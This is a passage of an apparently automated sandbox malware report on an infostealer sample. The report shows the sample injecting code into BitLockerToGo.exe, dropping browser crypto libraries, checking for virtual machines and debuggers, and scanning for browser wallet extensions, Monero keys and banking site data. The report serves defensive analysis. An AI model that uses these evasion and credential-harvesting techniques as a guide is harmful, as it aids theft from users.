                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_009045B9 push esi; ret 3_2_009045BB
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008FF635 push ecx; ret 3_2_008FF648
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9AB536 push ecx; ret 3_2_6C9AB549
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\mozglue.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\nss3.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\msvcp140.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\freebl3.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\vcruntime140.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\softokn3.dll

                          Boot Survival

                          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008FA132 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_008FA132
                          Source: C:\Users\user\Desktop\S0FTWARE.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Users\user\Desktop\S0FTWARE.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: Yara matchFile source: 3.2.BitLockerToGo.exe.8e0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.1170fec0.5.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116d2000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116c9ec0.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116d2000.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.116c9ec0.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.S0FTWARE.exe.1170fec0.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1628010774.000000001175E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.1628010774.0000000011646000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: S0FTWARE.exe PID: 8056, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7684, type: MEMORYSTR
                          Source: BitLockerToGo.exeBinary or memory string: DIR_WATCH.DLL
                          Source: BitLockerToGo.exeBinary or memory string: SBIEDLL.DLL
                          Source: BitLockerToGo.exeBinary or memory string: API_LOG.DLL
                          Source: BitLockerToGo.exe, 00000003.00000002.2669857775.0000000000911000.00000002.00000400.00020000.00000000.sdmpBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL11:08:1811:08:1811:08:1811:08:1811:08:1811:08:18DELAYS.TMP%S%SNTDLL.DLL
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,3_2_008E17FD
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\ProgramData\nss3.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dll
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI coverage: 9.8 %
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeLast function: Thread delayed
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F2A37 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 008F2B4Ah3_2_008F2A37
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008EA941 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,_memset,lstrcat,lstrcat,lstrcat,CopyFileA,_memset,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_008EA941
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F7178 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_008F7178
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F6A05 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,strtok_s,strtok_s,_memset,lstrcat,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,3_2_008F6A05
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008EE5B9 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_008EE5B9
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008EC528 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_008EC528
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F7D20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_008F7D20
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008E1D70 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_008E1D70
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008ECE96 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_008ECE96
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008EC888 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_008EC888
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F785A GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,3_2_008F785A
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F8D90 SHGetFolderPathA,wsprintfA,FindFirstFileA,_mbscmp,_mbscmp,_mbscmp,_splitpath,_ismbcupper,wsprintfA,SHFileOperation,FindNextFileA,FindClose,3_2_008F8D90
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008EDD2A wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,3_2_008EDD2A
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F6E7F GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,3_2_008F6E7F
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F2C16 GetSystemInfo,wsprintfA,3_2_008F2C16
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                          Source: Web Data.13.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                          Source: Web Data.13.drBinary or memory string: discord.comVMware20,11696494690f
                          Source: Web Data.13.drBinary or memory string: AMC password management pageVMware20,11696494690
                          Source: Web Data.13.drBinary or memory string: outlook.office.comVMware20,11696494690s
                          Source: BitLockerToGo.exe, 00000003.00000002.2671865903.00000000030F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh&
                          Source: Web Data.13.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                          Source: Web Data.13.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                          Source: Web Data.13.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                          Source: Web Data.13.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                          Source: Web Data.13.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                          Source: Web Data.13.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                          Source: Web Data.13.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                          Source: Web Data.13.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                          Source: BitLockerToGo.exe, 00000003.00000002.2671865903.00000000030F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarejvp
                          Source: BitLockerToGo.exe, 00000003.00000002.2671865903.0000000003159000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: msedge.exe, 0000000B.00000003.2231002220.00006FE800324000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,1(
                          Source: Web Data.13.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                          Source: Web Data.13.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                          Source: Web Data.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                          Source: Web Data.13.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                          Source: S0FTWARE.exe, 00000000.00000002.1623430445.0000000000757000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000B.00000002.2305442683.0000028845644000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: Web Data.13.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                          Source: Web Data.13.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                          Source: Web Data.13.drBinary or memory string: tasks.office.comVMware20,11696494690o
                          Source: Web Data.13.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                          Source: Web Data.13.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                          Source: Web Data.13.drBinary or memory string: dev.azure.comVMware20,11696494690j
                          Source: Web Data.13.drBinary or memory string: global block list test formVMware20,11696494690
                          Source: BitLockerToGo.exe, 00000003.00000002.2671865903.00000000030F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                          Source: Web Data.13.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                          Source: Web Data.13.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                          Source: Web Data.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                          Source: Web Data.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                          Source: Web Data.13.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                          Source: Web Data.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                          Source: Web Data.13.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                          Source: Web Data.13.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_3-72773
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_3-72788
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeAPI call chain: ExitProcess graph end nodegraph_3-73906
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information queried: ProcessInformation
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008FE88C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_008FE88C
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008FA132 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_008FA132
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008E149D mov eax, dword ptr fs:[00000030h]3_2_008E149D
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008E1492 mov eax, dword ptr fs:[00000030h]3_2_008E1492
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008E147A mov eax, dword ptr fs:[00000030h]3_2_008E147A
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F9D79 mov eax, dword ptr fs:[00000030h]3_2_008F9D79
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F9D78 mov eax, dword ptr fs:[00000030h]3_2_008F9D78
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F28AF GetProcessHeap,RtlAllocateHeap,GetUserNameA,3_2_008F28AF
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008FE88C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_008FE88C
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008FF20C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_008FF20C
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00908EAE SetUnhandledExceptionFilter,3_2_00908EAE
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9AB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6C9AB66C
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6C9AB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C9AB1F7
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_6CB5AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6CB5AC62

                          HIPS / PFW / Operating System Protection Evasion

                          Source: Yara matchFile source: Process Memory Space: S0FTWARE.exe PID: 8056, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7684, type: MEMORYSTR
                          Source: C:\Users\user\Desktop\S0FTWARE.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 8E0000 protect: page execute and read and write
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F12EC _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,3_2_008F12EC
                          Source: C:\Users\user\Desktop\S0FTWARE.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 8E0000 value starts with: 4D5A
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F42EE __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_008F42EE
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F4452 CreateToolhelp32Snapshot,Process32First,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,3_2_008F4452
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008F43C5 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_008F43C5
                          Source: C:\Users\user\Desktop\S0FTWARE.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 77E008
                          Source: C:\Users\user\Desktop\S0FTWARE.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 8E0000
                          Source: C:\Users\user\Desktop\S0FTWARE.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 8E1000
                          Source: C:\Users\user\Desktop\S0FTWARE.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 911000
                          Source: C:\Users\user\Desktop\S0FTWARE.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 91E000
                          Source: C:\Users\user\Desktop\S0FTWARE.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: B33000
                          Source: C:\Users\user\Desktop\S0FTWARE.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: B34000
                          Source: C:\Users\user\Desktop\S0FTWARE.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_008E118E cpuid 3_2_008E118E
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,3_2_008F2A37
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_0090C94C
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_0090B2D0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,3_2_0090CAE8
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,3_2_0090CA41
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,3_2_0090C3C0
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,3_2_0090CB43
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,3_2_00906C63
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: EnumSystemLocalesA,3_2_0090CDD6
                          Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_00908DF6
